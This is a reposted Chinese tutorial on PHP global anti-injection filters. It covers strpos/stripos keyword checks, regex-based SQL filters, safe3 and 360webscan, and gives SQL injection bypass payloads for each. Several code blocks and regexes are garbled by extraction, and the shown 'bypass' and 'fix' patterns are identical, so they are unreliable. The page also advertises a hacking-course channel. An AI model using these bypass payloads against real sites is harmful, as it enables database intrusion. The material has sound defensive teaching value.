安基网 首页 安全 Web安全 查看内容

PHP代码层防护与绕过

2020-1-16 11:38| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 搜索公众号:暗网黑客教程可领全套安全课程、配套攻防靶场一. 前言  在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。  这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代 ...

搜索公众号:暗网黑客教程

可领全套安全课程、配套攻防靶场



一. 前言

  

在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。

  

这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。




Bypass思路:利用数据库特性或过滤函数逻辑缺陷绕过。


二. 关键字过滤


1、使用strpos过滤关键字


PHP过滤代码如下:


|";$arr=explode("|",$str);#print_r($arr);foreach($arras$key=>$val){$flag=strpos($_GET['id'],$val);if($flag){echo'Error';exit();}}?>


Bypass思路:strpos() 函数查找字符串在另一字符串中第一次出现的位置。strpos() 函数对大小写敏感。

大小写绕过:id=1 AND 1=1 UNION SELECT 1,2,3 FROM ADMIN


2、使用stripos,进行关键字过滤

 

与strpos相比,stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)

PHP过滤代码如下:


|";$arr=explode("|",$str);#print_r($arr);foreach($arras$key=>$val){$flag=strpos($_GET['id'],$val);if($flag){echo'Error';exit();}}?>


Bypass思路:

当$flag等于0,即关键字在输入参数的第一位,可绕过

id=xsstest


关键字过滤类似的方法:


$value){//$_REQUEST['id']=str_replace(strtolower($value),'',strtolower($_REQUEST['id']));$_REQUEST['id']=str_replace($value,'',$_REQUEST['id']);}echo$_REQUEST['id'];?>


三.正则匹配


1、边界关键词


b 表示单词的边界,因此只有独立的 "union" 单词会被匹配

PHP过滤代码如下:


Bypass思路:

通过数据库的特性,在关键字前后添加字符,打扰关键字边界判断

id=1e0union/*!12345select*/1,2,3,4/*!12345from*/users


2、匹配模式


i 忽略大小写,匹配不考虑大小写,默认不匹配多行

PHP过滤代码如下:

  preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])


Bypass思路:

通过换行 n可绕过,url编码为%0a

  preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])


修复方案:

  preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])


四. PHP通用防护代码


1、safe3 防注入代码


Error number: [$errno],error on line $errline in $errfile
"; die();}set_error_handler("customError",E_ERROR);$getfilter="'|select|from|(and|or)b.+?(>|<|=|in|like)|/*.+?*/||<|binb|blikeb)|/*.+?*/||<|binb|blikeb)|/*.+?*/|
操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); @header("http/1.1 404 not found"); print "404: Not Found"; //slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue); print "Url里含有非法字符串,属于有误操作!... 
您还可以返回首页"; ;exit(); }}//$ArrPGC=array_merge($_GET,$_POST,$_COOKIE);foreach($_GET as $key=>$value){ StopAttack($key,$value,$getfilter);}foreach($_POST as $key=>$value){ StopAttack($key,$value,$postfilter);}foreach($_COOKIE as $key=>$value){ StopAttack($key,$value,$cookiefilter);}function slog($logs){ $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm"; $Ts=fopen($toppath,"a+"); fputs($Ts,$logs."rn"); fclose($Ts);}?>

如果正面怼正则,实在想不到绕过的方式。。


2、360webscan防御脚本

  

360网站安全:http://webscan.360.cn

  

http://webscan.360.cn/protect/index/?act=reinstall&domain=www.test.com下载漏洞修复插件360webscan.zip 多次下载解压失败,

  

无奈,跑到cmseasy下载最新版cms,解压获取 webscan360/360safe目录,分享到网盘,链接: https://pan.baidu.com/s/1nviNi2l 密码: 3itq

  

WEBSCAN_VERSION :0.1.3.2



SQL语句测试,成功拦截:

Bypass思路:


关键的两个正则:

  UNION.+?SELECTs*((.+)s*|@{1,2}.+?s*|s+?.+?|(`|'|").*?(`|'|")s*)  (SELECT|DELETE)@{0,2}((.+)|s+?.+?s+?|(`|'|").*?(`|'|"))FROM((.+)|s+?.+?|(`|'|").*?(`|'|"))  id=1e0union select!1,user(),3,4 from users



五.结束


本文简单演示了几种防护代码和绕过场景,在攻与防的道路上,不只是掌握一些技巧,是与代码的对抗,更是人与人的对抗。


作者:Bypass007

转载来源注明自:https://www.secpulse.com/archives/99326.html




小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6782361111598465547/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部